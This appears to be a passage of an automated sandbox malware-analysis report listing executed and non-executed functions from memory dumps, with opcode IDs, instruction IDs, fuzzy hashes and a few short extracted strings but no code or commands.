                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19554bb4175620f9de3e3ce8066df88a5f0c2b5c0b49f4a0c3191cf8be6b3ef7
                                      • Instruction ID: 8b41a40c0d551346ee7a166067a75d230b3a08b906b5a3bdc6ce04d588864a3f
                                      • Opcode Fuzzy Hash: 19554bb4175620f9de3e3ce8066df88a5f0c2b5c0b49f4a0c3191cf8be6b3ef7
                                      • Instruction Fuzzy Hash: 3BF0A03515DA55CFC742EB3CC8E58D5BF60FF02205B9A01FAD089CB5A2D315585ECB41
                                      Function 00007FFB4AE10C6C Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction ID: 90e3b4530d58e859959e78031070858628e3718b7be88cdb6309b45923bf29c3
                                      • Opcode Fuzzy Hash: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction Fuzzy Hash: DEF03A74D48259DFEB10FF68C5845ADBFF0FF44300F3045A5D42197244EA345A448B80
                                      Function 00007FFB4AE25318 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae20000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 162256fb4bdedd09d5557309124cba62a27418c9cc92d47c4feb75015d5e9647
                                      • Instruction ID: 35c1fbf9815b44137489b32477c49ebbbde48bcefd900287d78541d5175759fd
                                      • Opcode Fuzzy Hash: 162256fb4bdedd09d5557309124cba62a27418c9cc92d47c4feb75015d5e9647
                                      • Instruction Fuzzy Hash: 5FD05E30B60A094B8B0CBA3D8458470B3D5F7AA20A7E452B8940BC3281ED25ECC6CB80
                                      Function 00007FFB4AE25560 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae20000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e45cdeac27e6c7a4d3b929e20dacee255989f5ca2586e27b1fe29fd34552d2cb
                                      • Instruction ID: b688fc91d47f3958229209523864b7c02a9e7be25ae1cc83975fcc2eac615824
                                      • Opcode Fuzzy Hash: e45cdeac27e6c7a4d3b929e20dacee255989f5ca2586e27b1fe29fd34552d2cb
                                      • Instruction Fuzzy Hash: 8DD05E30B20D0D4B8B0CBA3D885C430B3D1F7A92067A452A9940AC22A1ED29ECC58780
                                      Function 00007FFB4AE246B2 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae20000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction ID: 0070a4db9c6702c52058f24c164babd924dd2ad746f39f15433760fc5179e36d
                                      • Opcode Fuzzy Hash: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction Fuzzy Hash: 7BE04F73A8C41687E765BE20C5515BA3387BFD4354F3402F6D02A871C1EDBC66068642
                                      Function 00007FFB4AE154B4 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 0ee713b78647d20b527666bb102ad91e0ec0da5f6ac01c6a044c92693e35cf69
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 97E0ED70A4C1368AFB94BD24D9507B966A4FB85310F7440F89A5E933C2DD29AE448745
                                      Function 00007FFB4B201AF7 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ec3b1ef7c56f22ef708a38863dff04c6f2c9cbb391a04e79fe4bffe1805f337
                                      • Instruction ID: 012fefaef67eaf1b9dc4236791789a9ba5a57730d01973c7d1925adf6aea2418
                                      • Opcode Fuzzy Hash: 1ec3b1ef7c56f22ef708a38863dff04c6f2c9cbb391a04e79fe4bffe1805f337
                                      • Instruction Fuzzy Hash: 1BD02BD1D0D7811FFB163EB049610781F505F1F38272A46B7E3465A2E3EA0C38044322
                                      Function 00007FFB4AE106AD Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: fe22828c588cfddbaea4adf16c034d2e6fb1e10eaf42f83b0b44b4f670da0d70
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 4CC08CE0DCF53F00B4407D3ED7020BCA908BBC8220FF000F3C02C80085AC4D20D50146
                                      Function 00007FFB4B20B7A1 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a9a6bcb70ddef3c0f89fe21562a49d37c3cf1c1fb19b88e7fd28de0309ab368
                                      • Instruction ID: c6b422fc8be7bf045a35330b9a29a087522419dc7316b985b4dbf798d8e176cf
                                      • Opcode Fuzzy Hash: 6a9a6bcb70ddef3c0f89fe21562a49d37c3cf1c1fb19b88e7fd28de0309ab368
                                      • Instruction Fuzzy Hash: 74D0C93110C809DF8AD4FF28C048D2477A1EB5974032180A4D20BC72B0DA28E800DB14
                                      Function 00007FFB4AE112B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 38a35cc4f78d43621fd59b677c9d7cf33c0390bd8621f7ac56e61f66798fa5de
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: EBC08C304548088FC948FF38C88482437A0FB0D214BE100D0E009CB170E219DCC0C740
                                      Function 00007FFB4B2025DB Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ce808d0e9444ae4957e9f640e80ecc839411bffb724ee653eb1b6128b6fa0a01
                                      • Instruction ID: 4667aa3f0dab0019ed38b7bd530f835d5213561c106909d818e86ae0c51628e1
                                      • Opcode Fuzzy Hash: ce808d0e9444ae4957e9f640e80ecc839411bffb724ee653eb1b6128b6fa0a01
                                      • Instruction Fuzzy Hash: 8DD09294A1D64386FDACBE61C26023A1DA5AF00300E60847BC39F518F1891CB4017705
                                      Function 00007FFB4AE136E2 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a134edacb945dbbfab0aa6a3f7b8e2e953ab81b8448663e739ac712cc060a886
                                      • Instruction ID: 0f4f9a9288a96fba64eacc482c0e58ff0481b07cf47b6bebb7c11bfd0db52c38
                                      • Opcode Fuzzy Hash: a134edacb945dbbfab0aa6a3f7b8e2e953ab81b8448663e739ac712cc060a886
                                      • Instruction Fuzzy Hash: F6C08CC0F0DC2A53F12B362CC12127E04829F40700FE00478E42FD26CECE0E19221286
                                      Function 00007FFB4B20D11F Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8d43f3396fcffa46e0241c50ed66f92a14d557e02481d69644c6e5ccafedbb86
                                      • Instruction ID: 9362b6de209e75174b9dae23249314ad5333c810ea62ff6ab87a5e947ea00cb0
                                      • Opcode Fuzzy Hash: 8d43f3396fcffa46e0241c50ed66f92a14d557e02481d69644c6e5ccafedbb86
                                      • Instruction Fuzzy Hash: C2C08C44E0E3038BEA103E70CA8003C1AD00F0A240B6445B1C74A8A1D3CC5838002321
                                      Function 00007FFB4AE106D0 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 81c2a12a3cbd04e33625413bd8526c532172944c35fe772657fb1c371c661f8b
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: C1B01290CDE43F00B4047D7A4A42074B844BB88100FF400F0D41C80085E88D14A40242
                                      Function 00007FFB4B206B43 Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4e8d19e53f400693bdeae261cd2dc30fb652c2b327032abf35a01b5647ed5dea
                                      • Instruction ID: 7febdf5d9c09fa88ea40da322f3302c31e88abb1646bf970a4e63c9dbd7f88ba
                                      • Opcode Fuzzy Hash: 4e8d19e53f400693bdeae261cd2dc30fb652c2b327032abf35a01b5647ed5dea
                                      • Instruction Fuzzy Hash: BFB09280E0C24382E9223CB0868007C08800B05304A604530D35A662E2DC5C3A402311
                                      Function 00007FFB4AE11958 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 5a808540bb85373f25323aeca6513dfecf496581c33cce77687c690daf4d83f2
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:

                                      Non-executed Functions

                                      Function 00007FFB4AE109B0 Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction ID: b025d66e3f5e36446bec3f6354de4736c738368f86a47395ebb5d53150d88d65
                                      • Opcode Fuzzy Hash: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction Fuzzy Hash: 1151C2D7A0E63285E11336FCF4011FD5B4C9F81275B1886B7DA4E990878E8861BB92F5
                                      Function 00007FFB4B3345DC Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2710317401.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b330000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ($-$/$4
                                      • API String ID: 0-139405495
                                      • Opcode ID: 3793d96d42ec87dd85f854ce6f181d3ae8004011348a119a9a3ceefbc5436ff1
                                      • Instruction ID: 03d3b65855b28eb4352deda10d47cfb8a163ebd68756e63a407f56080c87d60f
                                      • Opcode Fuzzy Hash: 3793d96d42ec87dd85f854ce6f181d3ae8004011348a119a9a3ceefbc5436ff1
                                      • Instruction Fuzzy Hash: A4518BA180E3C14FD7139B7498A62A17FB09F13214F0A85EBC8D5CF4E3E51D696AC762
                                      Function 00007FFB4B3328BF Relevance: 5.1, Strings: 4, Instructions: 55COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2710317401.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b330000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$3$F$Q
                                      • API String ID: 0-154221410
                                      • Opcode ID: a0712dbe78ce99f650a38df42673a8fcc93ca7d72442eeef1912e8acabf18e39
                                      • Instruction ID: 50be7e153734bf9c068435da96758dc83b215538e6f14d24569f31414392b910
                                      • Opcode Fuzzy Hash: a0712dbe78ce99f650a38df42673a8fcc93ca7d72442eeef1912e8acabf18e39
                                      • Instruction Fuzzy Hash: CD01457292C2854BE71DEE29DC827753791EF46301F1581BEC8CBC72E3EA2C58168786

                                      Executed Functions

                                      Function 00007FFB4ADF0D48 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5\_H
                                      • API String ID: 0-3325266018
                                      • Opcode ID: 0d183a97a79c084742fd12e7f619f15733de4102f063662a3bfb2a1c3317ad8e
                                      • Instruction ID: e8e8694a2ab7e42bf6b6ac6502e1603a13df0cf58fa769d036cb735f923763a9
                                      • Opcode Fuzzy Hash: 0d183a97a79c084742fd12e7f619f15733de4102f063662a3bfb2a1c3317ad8e
                                      • Instruction Fuzzy Hash: 8D51D2E1A0DA8D4FE79AEB78C8667A97FF5FF55300F4401BAE048C72D6DA2818158351
                                      Function 00007FFB4ADF08D0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: d75a85e4293a04635712a3cec052763c1f23fd9886638871fbaca33e01639b1e
                                      • Instruction ID: c1c1919333293dd9675b678eeed97e5aeef4f5efec1384a5bff805641025089a
                                      • Opcode Fuzzy Hash: d75a85e4293a04635712a3cec052763c1f23fd9886638871fbaca33e01639b1e
                                      • Instruction Fuzzy Hash: 61418C92B0E6551EE301BBB8E09A1FE7B95DF45331B1844FBE94DCB193DD0868828291
                                      Function 00007FFB4ADF0960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: eb8efef586d8cdead6aded02472b6a4d80b37ba73b9d492d8746399f7232cdc4
                                      • Instruction ID: 9c91457b9485a74e9db17ec28c8d584a5eb0a865abda2af10d7d5a31a74436e2
                                      • Opcode Fuzzy Hash: eb8efef586d8cdead6aded02472b6a4d80b37ba73b9d492d8746399f7232cdc4
                                      • Instruction Fuzzy Hash: BE3137A1B0EA5A1FF355BA7CE45E1FA77C6DF49321B5440FAE80EC71E3CC1868824295
                                      Function 00007FFB4ADF0998 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: a9cb5274ff9b3a1f65e482b102c86a7ef08a28039b418afeb048fad9e9c72153
                                      • Instruction ID: 2e2c6c01000ca3970e892f8ec316aef444575a9cb228c99cd596e0a87777f971
                                      • Opcode Fuzzy Hash: a9cb5274ff9b3a1f65e482b102c86a7ef08a28039b418afeb048fad9e9c72153
                                      • Instruction Fuzzy Hash: 9A31F6A0B1D9591FE749BA38C05E6BA77D6DF58311B9400FDE84EC72E3DC14AC818281
                                      Function 00007FFB4ADF0F60 Relevance: .1, Instructions: 127COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e631be6ef2299cc948ac291e1ecf3d3044c75aafed19adfcfb802863d132162a
                                      • Instruction ID: 92a77b0f15d47cd36795e75c1cca8c3c14c6ca3c01d6bc745ec48e285f70b4dc
                                      • Opcode Fuzzy Hash: e631be6ef2299cc948ac291e1ecf3d3044c75aafed19adfcfb802863d132162a
                                      • Instruction Fuzzy Hash: 8341E4B499D6DA8EE349EF38C8687E63FF1EB5A321F5400BED049C7292CA791495C740
                                      Function 00007FFB4ADF0908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 7d5846c75c7eaa48883bc85272fe6b1179da3526f5de1830ce905a9e29f9ce52
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: CD21A53130C8184FD768EE1CE889EB973D5EF5932171501BAE58BC7126D911EC8287C1
                                      Function 00007FFB4ADF116D Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 127212eca521c368521c0e1b2a4f7b22c5e6b0b6774c091a29286c001f05dacc
                                      • Instruction ID: a89517a6129b94e3e995e757bd1c6f2bc8e10d824a7bf34d8cfb49421f7171e6
                                      • Opcode Fuzzy Hash: 127212eca521c368521c0e1b2a4f7b22c5e6b0b6774c091a29286c001f05dacc
                                      • Instruction Fuzzy Hash: BE31AF70A0D64A8FDF45EF78C8549AA7BE0FF5A310B1446FAE00AD7192DA28A541CB40
                                      Function 00007FFB4ADF0C25 Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d3c665024e9c38b43201bfe09a268f33cbc604a86c9618ac5c7be5f618ee999e
                                      • Instruction ID: 40b4858f268c3c1ee6262d63e2fb7b6aa0beb55e11f59508d727efb76cda1ce8
                                      • Opcode Fuzzy Hash: d3c665024e9c38b43201bfe09a268f33cbc604a86c9618ac5c7be5f618ee999e
                                      • Instruction Fuzzy Hash: 8311B2B6A0C2468FF312AF74D9411EE7B68DF42324F2941F6D5849B1D2E93825468751
                                      Function 00007FFB4ADF0B77 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c53faeb0918594ed767af8e69b8bdf675ef7c696688f2b6fa67d0469b1e20016
                                      • Instruction ID: 2d19a1c11d7897b45bbcb67d4eb5d7ba29f3c8ba1266538c4a12c7c751fc83ac
                                      • Opcode Fuzzy Hash: c53faeb0918594ed767af8e69b8bdf675ef7c696688f2b6fa67d0469b1e20016
                                      • Instruction Fuzzy Hash: 3DF0A03915DA45CFD346EB3DC8A58D5BB60FF06204B9A01FAD089CB4A2D315585ECB51
                                      Function 00007FFB4ADF0C6F Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cff8142655e75eb701fa10170e699754e661b48cca686ae6ad7dcb80ed2f278f
                                      • Instruction ID: 7c2855184f95954f13678760fe003567eb8ba1ff51bf984352cb3fe299bd67cd
                                      • Opcode Fuzzy Hash: cff8142655e75eb701fa10170e699754e661b48cca686ae6ad7dcb80ed2f278f
                                      • Instruction Fuzzy Hash: A3F0F874E08249DFEB10EF64C58459EBBF0EF44314F2046A9E405D7244EA349A848B80
                                      Function 00007FFB4ADF54B4 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 5b3a8b521b49d6e13e6393da887f1e0c739fc94328dd5d2d596b3eebef3186bd
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 7CE01260F0C1164BFB94BD24D9407AA6264DB49314F2440F8FB4E933C1ED38AE448745
                                      Function 00007FFB4ADF06AD Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
